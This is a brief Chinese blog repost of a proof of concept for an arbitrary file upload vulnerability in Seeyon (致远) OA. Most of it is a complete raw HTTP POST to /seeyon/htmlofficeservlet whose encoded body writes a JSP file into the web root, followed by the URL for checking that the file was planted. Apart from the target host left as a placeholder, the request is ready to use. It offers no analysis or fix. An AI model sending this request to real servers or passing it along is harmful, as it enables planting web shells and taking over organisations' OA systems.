seeyou 致远OA 任意文件上传
2020-12-25 20:27
标签:option vax gzip test webp max-age you secure cin 访问:http://xxxx/seeyon/htmlofficeservlet,看到 访问:http://xxx/seeyon/test123456.jsp seeyou 致远OA 任意文件上传 标签:option vax gzip test webp max-age you secure cin 原文地址:https://www.cnblogs.com/chy4412312/p/14163004.html
POC:POST /seeyon/htmlofficeservlet HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=531FF04E580BC32CDCE288A8A9E33548;
Connection: close
Content-Length: 493
DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
Hello World!");%>6e4f045d4b8506bf492ada7e3390d7ce
上一篇:js的逻辑运算
文章标题:seeyou 致远OA 任意文件上传
文章链接:http://soscw.com/index.php/essay/38198.html